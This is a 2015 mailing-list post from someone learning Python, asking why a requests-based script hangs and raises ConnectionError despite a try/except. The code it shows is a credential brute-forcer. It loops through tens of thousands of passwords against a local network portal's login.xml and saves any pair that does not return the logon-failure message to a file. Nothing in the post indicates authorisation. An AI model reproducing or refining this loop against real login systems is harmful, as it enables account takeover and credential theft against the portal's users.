ConnectionError handling problem

shiva upreti katewinslet626 at gmail.com
Sat Sep 19 02:13:20 EDT 2015

I am learning python. I wrote a script using requests module.
The scripts runs fine for sometime, but after a while it hangs. When I press CTRL+C it shows ConnectionError even though I have included exception handling.
I am not sure as to why it cant handle ConnectionError when the script runs for a long time.

This is a part(causing issues) of the script I am running:

while(k<46656):
		j=res[k]
		url="http://172.16.68.6:8090/login.xml"
		query_args = {'mode':'191', 'username':str(i), 'password':str(j), 'a':'1442397582010', 'producttype':'0'}

		try:
			r=requests.post(url, data=query_args)
		except:
			print "Connection error"
			time.sleep(30)
			continue

		html=r.text
		if(len(html) < 10):
			continue

		if("The system could not log you on" not in html):
			print "hello"
			filehandle=open("ids", "a")
			filehandle.write(str(i)+'\n')
			filehandle.write(str(j)+'\n')